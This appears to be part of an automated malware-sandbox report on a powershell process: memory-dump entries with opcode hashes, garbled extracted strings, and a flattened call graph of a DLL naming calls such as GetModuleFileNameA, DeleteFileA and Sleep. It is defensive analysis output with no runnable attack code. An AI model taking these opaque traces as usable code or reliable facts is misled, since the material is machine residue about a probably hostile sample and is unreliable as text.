                                                                                    • Instruction ID: c9cc13eda9c5125e508d1d640cca647802b2ba66ddfda194c12ebe456c004ded
                                                                                    • Opcode Fuzzy Hash: 89724448e83542744d54fa8d65b866c870597a11cd903ddd9c8521beabccb4bc
                                                                                    • Instruction Fuzzy Hash: 47F0E933705B509B8B1657E9B8005EEBB6ACECA7F13048067E059CF190EA64A91543E6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1b1fe5e2841d895a3811993fdc48de7822d7c77e79f454362ef73d071cf20416
                                                                                    • Instruction ID: 753b33e927d1e9383909787b9a2773e089592ac3d4c5ae67a122b7c039bad5db
                                                                                    • Opcode Fuzzy Hash: 1b1fe5e2841d895a3811993fdc48de7822d7c77e79f454362ef73d071cf20416
                                                                                    • Instruction Fuzzy Hash: 1FF02BB11097805FC31AA379A88045D7FA5DECA570304896BC145CFA61DF285806837A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703694674.000000000316D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0316D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_316d000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: fe180af39c4efd4a76cb1ffb87a6f66faae6a3cf408709d0e85d97d5e1d4615e
                                                                                    • Instruction ID: 8f61f2d79c59a9fcc6d697813fc752c77b455bc9977e67b13d19facda287d01d
                                                                                    • Opcode Fuzzy Hash: fe180af39c4efd4a76cb1ffb87a6f66faae6a3cf408709d0e85d97d5e1d4615e
                                                                                    • Instruction Fuzzy Hash: 58F0F976200600AF9724CF0AD984C23FBADEFD4770719C59AE84A4B622C771EC42CAA0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f13e043ad1317e0dee51d6380449966233525e2eeb59e05de6a18eae985439ff
                                                                                    • Instruction ID: 2a6e104564521330d1b5eb8548530fef63eec207b269b1f01e6a431d29251124
                                                                                    • Opcode Fuzzy Hash: f13e043ad1317e0dee51d6380449966233525e2eeb59e05de6a18eae985439ff
                                                                                    • Instruction Fuzzy Hash: ECF0BBB55093404FD7609B78E49C39BBFE8EB05760F04885ED15DC7282D73578458750
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6ab1b7c6c4aeade8eb567b02ed34889396062ecdfdfb85f149426f89ed53734f
                                                                                    • Instruction ID: e3c321da65346653a8e6dc12f777a26ee501465dc83b211387b62ded84d7e599
                                                                                    • Opcode Fuzzy Hash: 6ab1b7c6c4aeade8eb567b02ed34889396062ecdfdfb85f149426f89ed53734f
                                                                                    • Instruction Fuzzy Hash: 47F082357041408FC3118F5DE494C76BBF9EFCA75431940A9E088DB372DA61EC01CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703694674.000000000316D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0316D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_316d000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e2118821b1bdb6d88783edcf5f2c3311fcb08c38dc2de93d6e4357a3c6e99dd0
                                                                                    • Instruction ID: 1fdf7217e236fb0e38c5c735341c1f66ab20fa7485bf494968f4faeeaf95ca83
                                                                                    • Opcode Fuzzy Hash: e2118821b1bdb6d88783edcf5f2c3311fcb08c38dc2de93d6e4357a3c6e99dd0
                                                                                    • Instruction Fuzzy Hash: 1DF0FF75104640AFD725CF06CD84D23BBB9EB89660B198589E85A4B322C731FC46CB60
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: dacb087f9493d5308818e3a8d88d0fea78bd6d3c3dd135441d3de29f9f462b07
                                                                                    • Instruction ID: fbd443053915372f27c049ee205da2d49a899990a991def3be3f34bfa612a911
                                                                                    • Opcode Fuzzy Hash: dacb087f9493d5308818e3a8d88d0fea78bd6d3c3dd135441d3de29f9f462b07
                                                                                    • Instruction Fuzzy Hash: 44F0A7757007149FC710DB6AE84496F77EAEB8C761B00092DE10AD7380DF74AC458BA0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b85a5ba561263d7cbb3f646e9dfca0512f82e2b0301a4e5e494685f023ceed49
                                                                                    • Instruction ID: 6451a8693f51c29f0319b652c0f926a9457b81496caa553d5060b2edc4477384
                                                                                    • Opcode Fuzzy Hash: b85a5ba561263d7cbb3f646e9dfca0512f82e2b0301a4e5e494685f023ceed49
                                                                                    • Instruction Fuzzy Hash: 59F082B52003046BC304E669D88495AB79AEFC92547108E3DD2198F724EF32BC1587A1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a3d8595f3b88cb0eaf6af784ef275ae9b73ba9079581f38b1bc8b74a0cd8b130
                                                                                    • Instruction ID: d5fc281f1512e89ae98580c44c87569bb40f0292b86dabbc73af88655e6c1b23
                                                                                    • Opcode Fuzzy Hash: a3d8595f3b88cb0eaf6af784ef275ae9b73ba9079581f38b1bc8b74a0cd8b130
                                                                                    • Instruction Fuzzy Hash: 25F01C797001188FCB10DBADA840AAABBA6EBCD795B158165E50ACB364DB34EC118B91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c8d746c1ee194eac21858d9c3fc576fce03a08ad68d0855b41c915f53e72ae7e
                                                                                    • Instruction ID: 30a9c7ce5643dfec8514bbf698fa828c68dff96d7fb902e58f058675083e885a
                                                                                    • Opcode Fuzzy Hash: c8d746c1ee194eac21858d9c3fc576fce03a08ad68d0855b41c915f53e72ae7e
                                                                                    • Instruction Fuzzy Hash: FDF027796006148BE708BB64D00839FB7D6EFC5315F10852AD9194B384CE396805C7E0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5acbc0fcbf11d0b00d3990dfc7faa2d47742d85ca0c50749b0614c74b49d8ff6
                                                                                    • Instruction ID: 0484a567deec7785b783390ef9f714d26066d5477c10834f73f75e5d0e905a10
                                                                                    • Opcode Fuzzy Hash: 5acbc0fcbf11d0b00d3990dfc7faa2d47742d85ca0c50749b0614c74b49d8ff6
                                                                                    • Instruction Fuzzy Hash: 67F0273530C3505BCB0A2775A81C2AE7F55AFC67A0F04845BE50587286CF2C681183E5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e41e4f67b200dfc42f70067299d9af12e80d0b7e59fd81141fa046de91843185
                                                                                    • Instruction ID: b99c20e20c7ce4a1c6009cdc090d0dfb4eb7ae0dcdf598305e6b0849a02c6da8
                                                                                    • Opcode Fuzzy Hash: e41e4f67b200dfc42f70067299d9af12e80d0b7e59fd81141fa046de91843185
                                                                                    • Instruction Fuzzy Hash: 9AE01A763001148F87109F5DE498C6AB7FAEFCE76571940A9E549CB771DA61EC01CB90
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1715618775.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_77e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $c;k$4'tq$4'tq$4'tq$4'tq$84Fl$84Fl$tPtq$tPtq$JIl$JIl$JIl$JIl$JIl$rHl$rHl
                                                                                    • API String ID: 0-2538519358
                                                                                    • Opcode ID: cacae04502644dab8f0f48bb7524bc5fedb1ee12181a9a412eb7fe9a06361b92
                                                                                    • Instruction ID: 6d846ecb2421dcc7198e1ee45aeda93c0b2888ece446c29793019e5e885dcd8b
                                                                                    • Opcode Fuzzy Hash: cacae04502644dab8f0f48bb7524bc5fedb1ee12181a9a412eb7fe9a06361b92
                                                                                    • Instruction Fuzzy Hash: 4CD14CB1B0420A8FCB25CB69C411A66FBBABFC9391F14C4ABD515CF256DB31C891C7A1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1715618775.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_77e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 4'tq$4'tq$tPtq$tPtq$$tq$$tq$$tq$$tq$>l$>l
                                                                                    • API String ID: 0-2759691463
                                                                                    • Opcode ID: dd740f8adca086d536004acf34e257a3a0dddc699236ad66dbc038ec9fe8a752
                                                                                    • Instruction ID: e0c4ec847208efad25c69e67c53c0e5dd432e5bf5cfb4b30499e07beb1cbaaef
                                                                                    • Opcode Fuzzy Hash: dd740f8adca086d536004acf34e257a3a0dddc699236ad66dbc038ec9fe8a752
                                                                                    • Instruction Fuzzy Hash: ABA168B17043559FD7219B798811B76BBBAAFCA290F14846AE446CF291DB31CC81C7A1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1715618775.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_77e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: fyq$84Fl$`Qtq$`Qtq$tPtq$$tq$$tq$$tq$$tq$$tq
                                                                                    • API String ID: 0-761189167
                                                                                    • Opcode ID: e8ecfaf15a5c447669c4f5e3f389124b9e2e0f01abd080c7f4b6604a45bc180d
                                                                                    • Instruction ID: 88e3fc40696d2bb3859ee323e23a9ce7c794d6aa8dc66ed01656a2996140b1e2
                                                                                    • Opcode Fuzzy Hash: e8ecfaf15a5c447669c4f5e3f389124b9e2e0f01abd080c7f4b6604a45bc180d
                                                                                    • Instruction Fuzzy Hash: 5061AEB070420EDFDB24CE49C846BAAB7BABF4D391F958855E8019B290C735DD90CBA1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1715618775.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_77e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 4'tq$4'tq$$tq$$tq$$tq$>l$>l
                                                                                    • API String ID: 0-3697895749
                                                                                    • Opcode ID: abe35def053f3393e21e7fe51cbe94757cad72da14a58518413a87d84e312f49
                                                                                    • Instruction ID: ecbbff83b8ea7778623439dc0c97bdcdb673a323fdd073eb2daa65a461a3f801
                                                                                    • Opcode Fuzzy Hash: abe35def053f3393e21e7fe51cbe94757cad72da14a58518413a87d84e312f49
                                                                                    • Instruction Fuzzy Hash: A3515CF17043469FDB2586798811B6AFBFAAFCA2A1F24847BD445CB251DB31C881C7A1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1715618775.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_77e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 4'tq$4'tq$4'tq$4'tq$$tq$$tq
                                                                                    • API String ID: 0-1361008733
                                                                                    • Opcode ID: 4a5aebff1410b713a8dfd50848c2997b782767692f307a95ca16a2ad88de175c
                                                                                    • Instruction ID: 10707209b4660b58ff58d7a08ea20fc71c943b21bfd13ffc85b76da026009f83
                                                                                    • Opcode Fuzzy Hash: 4a5aebff1410b713a8dfd50848c2997b782767692f307a95ca16a2ad88de175c
                                                                                    • Instruction Fuzzy Hash: DD41E4B160E3D54FC72752782C205A6AFB95F8B19073A05DBC481DF297D9944C4AC3B3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: tMHl$`uq$`uq$`uq$`uq
                                                                                    • API String ID: 0-2489500751
                                                                                    • Opcode ID: 75b19a6527044d1c7940923adf10aa5264449134f10e4917d04a4af9ac774b5a
                                                                                    • Instruction ID: db55d47dfb731e3cd01d35f0bb49617a9a75fb5fca19289d19a0be42f6ed6034
                                                                                    • Opcode Fuzzy Hash: 75b19a6527044d1c7940923adf10aa5264449134f10e4917d04a4af9ac774b5a
                                                                                    • Instruction Fuzzy Hash: C0B1A574A006099FDB45DFA9D480A9DFBF2FF88300F108629E419AB355EB34A945CF91
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: tMHl$`uq$`uq$`uq$`uq
                                                                                    • API String ID: 0-2489500751
                                                                                    • Opcode ID: 0f436721e228a38b6ddde8c466285b6cd773f2b87bf0232016588576faf3f07c
                                                                                    • Instruction ID: 0fb63bc3a6df859c04a2e950473d00ab62232c971dbe1e0d91becc7d8049b745
                                                                                    • Opcode Fuzzy Hash: 0f436721e228a38b6ddde8c466285b6cd773f2b87bf0232016588576faf3f07c
                                                                                    • Instruction Fuzzy Hash: ACB18574E006099FDB54DFA9D980A9DFBF2FF88300F108629E419AB354EB74A945CF91
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: tMHl$`uq$`uq$`uq$`uq
                                                                                    • API String ID: 0-2489500751
                                                                                    • Opcode ID: c638bc83c0b3dbe3ebf7938920a4834fed424bccc2957bfa4ccac27c086ab942
                                                                                    • Instruction ID: d5235e1254afd84b7e6ebf0370dbafa46579896e17e7e38ac3a3e192674251d4
                                                                                    • Opcode Fuzzy Hash: c638bc83c0b3dbe3ebf7938920a4834fed424bccc2957bfa4ccac27c086ab942
                                                                                    • Instruction Fuzzy Hash: D9A19378E006099FDB54DFA9D990A9DFBF2FF48300F108629E419AB355EB34A945CF90
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1715618775.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_77e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: JIl$JIl$JIl$JIl
                                                                                    • API String ID: 0-3186157469
                                                                                    • Opcode ID: b057c390c86d417d9aa87e9c18461440e08cb3d40aeef0b07cdf9cea43f32a44
                                                                                    • Instruction ID: c1b7353db6a0560abeca2696a5acc05cc618333dcc1f20265f8b7be0bf85a351
                                                                                    • Opcode Fuzzy Hash: b057c390c86d417d9aa87e9c18461440e08cb3d40aeef0b07cdf9cea43f32a44
                                                                                    • Instruction Fuzzy Hash: 9041E7F16087559FCB218B648401AA6BFBCBF4B290F0984A7D8549F553C734C984CBA2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1715618775.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_77e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $tq$$tq$$tq$$tq
                                                                                    • API String ID: 0-173548568
                                                                                    • Opcode ID: 4c9547673886fefb5b23f54b6b38655612da001a736ffdca0cfbc406cd6dd233
                                                                                    • Instruction ID: a82c34ca5400ff80e7a903a8ead412f106ad5082d19ff919c0fa3017cc4a3e9e
                                                                                    • Opcode Fuzzy Hash: 4c9547673886fefb5b23f54b6b38655612da001a736ffdca0cfbc406cd6dd233
                                                                                    • Instruction Fuzzy Hash: 7C2168B271421AABEB34553E9C10B37B7DE9BC9398F24843AE905CB381ED75C8618361
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1715618775.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_77e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $tq$$tq$JIl$JIl
                                                                                    • API String ID: 0-3054621161
                                                                                    • Opcode ID: 2e338b2dca8be57632cc3b8e8a117164111039e371950ff6bceb2127d72b268a
                                                                                    • Instruction ID: 908324204fe36f57fc58f4f15679639f572d4db6ed923529a0ff1f04e3c27535
                                                                                    • Opcode Fuzzy Hash: 2e338b2dca8be57632cc3b8e8a117164111039e371950ff6bceb2127d72b268a
                                                                                    • Instruction Fuzzy Hash: A901CCB260E7924FC723922C9C1085AAF6E6F87290B1949D7C684DF26BC9348E45C363

Execution Graph

Execution Coverage: 6.8%
Dynamic/Decrypted Code Coverage: 82.1%
Signature Coverage: 0.1%
Total number of Nodes: 1578
Total number of Limit Nodes: 44
char_traits 72618->72622 72620->72575 72621->72618 72622->72620 72624 100035d5 72623->72624 72629 10003980 72624->72629 72626 100035ee Concurrency::task_continuation_context::task_continuation_context 72627 10003ee0 8 API calls 72626->72627 72628 10002afd 72627->72628 72628->72537 72630 10003992 72629->72630 72631 10003997 72629->72631 72633 10003a70 ?_Xout_of_range@std@@YAXPBD 72630->72633 72631->72626 72633->72631 72638 100153f0 72634->72638 72636 1001541d __stdio_common_vsprintf 72637 10015439 72636->72637 72637->72543 72638->72636 72640 10003247 _Error_objects Concurrency::task_continuation_context::task_continuation_context 72639->72640 72642 10003278 Concurrency::task_continuation_context::task_continuation_context 72640->72642 72643 10003910 _invalid_parameter_noinfo_noreturn allocator 72640->72643 72642->72548 72643->72642 72645 10013cf6 Concurrency::task_continuation_context::task_continuation_context 72644->72645 72651 10013d70 _Error_objects 72645->72651 72652 10014390 7 API calls 72645->72652 72647 10013d29 72653 10014ec0 memcpy HandleT 72647->72653 72649 10013d51 72654 10014230 _invalid_parameter_noinfo_noreturn 72649->72654 72651->72552 72652->72647 72653->72649 72654->72651 72656 100127f4 72655->72656 72657 100127f6 72655->72657 72656->72556 72657->72656 72658 1001280e 72657->72658 72660 1001283c Concurrency::task_continuation_context::task_continuation_context 72657->72660 72666 10013ed0 9 API calls 3 library calls 72658->72666 72660->72656 72667 100131d0 _invalid_parameter_noinfo_noreturn memcpy HandleT _Error_objects Concurrency::task_continuation_context::task_continuation_context 72660->72667 72663 10012914 72662->72663 72665 100128cd Concurrency::task_continuation_context::task_continuation_context 72662->72665 72668 10013fe0 9 API calls 3 library calls 72663->72668 72665->72556 72666->72656 72667->72656 72668->72665 72670 1001442c _Error_objects Concurrency::task_continuation_context::task_continuation_context 72669->72670 72671 100144c7 
_Error_objects Concurrency::task_continuation_context::task_continuation_context 72670->72671 72672 10014518 Concurrency::task_continuation_context::task_continuation_context 72670->72672 72687 100036d0 memcpy 72671->72687 72674 100145d3 Concurrency::task_continuation_context::task_continuation_context 72672->72674 72676 10014568 HandleT _Error_objects 72672->72676 72679 100145ee Concurrency::task_continuation_context::task_continuation_context 72674->72679 72690 10001410 ?_Xlength_error@std@@YAXPBD 72674->72690 72688 100039e0 memcpy 72676->72688 72678 100145a9 Concurrency::task_continuation_context::task_continuation_context 72689 100036d0 memcpy 72678->72689 72680 100048e0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 72679->72680 72682 1001462d HandleT Concurrency::task_continuation_context::task_continuation_context 72680->72682 72691 100036d0 memcpy 72682->72691 72684 1001467a Concurrency::task_continuation_context::task_continuation_context 72692 100036d0 memcpy 72684->72692 72686 10014507 _Error_objects 72686->72561 72687->72686 72688->72678 72689->72686 72690->72679 72691->72684 72692->72686 72694 100130d6 _Error_objects Concurrency::task_continuation_context::task_continuation_context 72693->72694 72696 1001262f 72694->72696 72697 10003a90 _invalid_parameter_noinfo_noreturn allocator 72694->72697 72696->72482 72697->72696 72699 1000b5a8 72698->72699 72700 10002da0 8 API calls 72699->72700 72701 1000b5be 72700->72701 72938 10005540 GetModuleFileNameA 72701->72938 72703 1000b5d1 _Smanip _Error_objects 72704 10012640 9 API calls 72703->72704 72705 1000bc37 _Smanip _Error_objects 72704->72705 72706 10012640 9 API calls 72705->72706 72707 10010552 72706->72707 72708 10005400 9 API calls 72707->72708 72709 10010569 72708->72709 72710 10005400 9 API calls 72709->72710 72711 10010583 _Error_objects 72710->72711 72972 10004fe0 72711->72972 72715 100105da 72716 10002cb0 _invalid_parameter_noinfo_noreturn 72715->72716 72717 100105e5 
72716->72717 72718 10004fe0 17 API calls 72717->72718 72719 100105f9 72718->72719 72720 10002cd0 _invalid_parameter_noinfo_noreturn 72719->72720 72721 10010614 72720->72721 72722 10002cb0 _invalid_parameter_noinfo_noreturn 72721->72722 72723 1001061f _Smanip _Error_objects 72722->72723 72724 10012640 9 API calls 72723->72724 72725 10010770 72724->72725 72726 10005400 9 API calls 72725->72726 72727 10010787 72726->72727 72728 10012620 _invalid_parameter_noinfo_noreturn 72727->72728 72729 10010799 72728->72729 73000 10002e20 72729->73000 72733 100107cb _Smanip _Error_objects 72734 10012640 9 API calls 72733->72734 72735 10010881 72734->72735 72736 10005400 9 API calls 72735->72736 72737 10010898 72736->72737 73011 100138d0 72737->73011 72739 100108cb 72740 10002cb0 _invalid_parameter_noinfo_noreturn 72739->72740 72741 100108dd 72740->72741 72742 10012620 _invalid_parameter_noinfo_noreturn 72741->72742 72743 100108ec 72742->72743 73014 10005520 DeleteFileA 72743->73014 72745 100108fe 72746 10002da0 8 API calls 72745->72746 72747 10010918 72746->72747 73016 10005300 72747->73016 72750 10002cb0 _invalid_parameter_noinfo_noreturn 72751 10010941 Sleep 72750->72751 72752 10010959 72751->72752 72753 10002da0 8 API calls 72752->72753 72754 10010965 _Smanip _Error_objects 72753->72754 72755 10012640 9 API calls 72754->72755 72756 100109da 72755->72756 72757 10005400 9 API calls 72756->72757 72758 100109f1 72757->72758 72759 10002e20 8 API calls 72758->72759 72760 10010a3b 72759->72760 72761 10005250 13 API calls 72760->72761 72762 10010a47 72761->72762 72763 10002cb0 _invalid_parameter_noinfo_noreturn 72762->72763 72764 10010a5f 72763->72764 72765 10012620 _invalid_parameter_noinfo_noreturn 72764->72765 72766 10010a6e 72765->72766 72767 10002cb0 _invalid_parameter_noinfo_noreturn 72766->72767 72768 10010a7d 72767->72768 72769 10002da0 8 API calls 72768->72769 72770 10010a95 _Smanip _Error_objects 72769->72770 72771 10012640 9 API calls 72770->72771 72772 10010b0e 72771->72772 
72773 10005400 9 API calls 72772->72773 72774 10010b25 72773->72774 72775 10002e20 8 API calls 72774->72775 72776 10010b6f 72775->72776 72777 10005250 13 API calls 72776->72777 72778 10010b7b 72777->72778 72779 10002cd0 _invalid_parameter_noinfo_noreturn 72778->72779 72780 10010ba2 72779->72780 72781 10002cb0 _invalid_parameter_noinfo_noreturn 72780->72781 72782 10010bad 72781->72782 72783 10002cb0 _invalid_parameter_noinfo_noreturn 72782->72783 72784 10010bbc 72783->72784 72785 10012620 _invalid_parameter_noinfo_noreturn 72784->72785 72786 10010bcb 72785->72786 72787 10002cb0 _invalid_parameter_noinfo_noreturn 72786->72787 72788 10010bda 72787->72788 73027 100139a0 72788->73027 72792 10010c21 72793 10013a30 9 API calls 72792->72793 72794 10010c4f 72793->72794 72795 10013a30 9 API calls 72794->72795 72796 10010c7d 72795->72796 72797 10013a30 9 API calls 72796->72797 72798 10010cab 72797->72798 72799 10013a30 9 API calls 72798->72799 72800 10010cd9 72799->72800 72801 10013a30 9 API calls 72800->72801 72802 10010d07 72801->72802 72803 10013a30 9 API calls 72802->72803 72804 10010d35 72803->72804 72805 10013a30 9 API calls 72804->72805 72806 10010d63 72805->72806 72807 10013a30 9 API calls 72806->72807 72808 10010d91 72807->72808 72809 10013a30 9 API calls 72808->72809 72810 10010dbf 72809->72810 72811 10013a30 9 API calls 72810->72811 72812 10010ded 72811->72812 72813 10002cb0 _invalid_parameter_noinfo_noreturn 72812->72813 72814 10010dff 72813->72814 72815 10002cb0 _invalid_parameter_noinfo_noreturn 72814->72815 72816 10010e0e 72815->72816 72817 10002cb0 _invalid_parameter_noinfo_noreturn 72816->72817 72818 10010e1d 72817->72818 72819 10002cb0 _invalid_parameter_noinfo_noreturn 72818->72819 72820 10010e2c 72819->72820 72821 10002cb0 _invalid_parameter_noinfo_noreturn 72820->72821 72822 10010e3b 72821->72822 72823 10002cb0 _invalid_parameter_noinfo_noreturn 72822->72823 72824 10010e4a 72823->72824 72825 10002cb0 _invalid_parameter_noinfo_noreturn 72824->72825 72826 
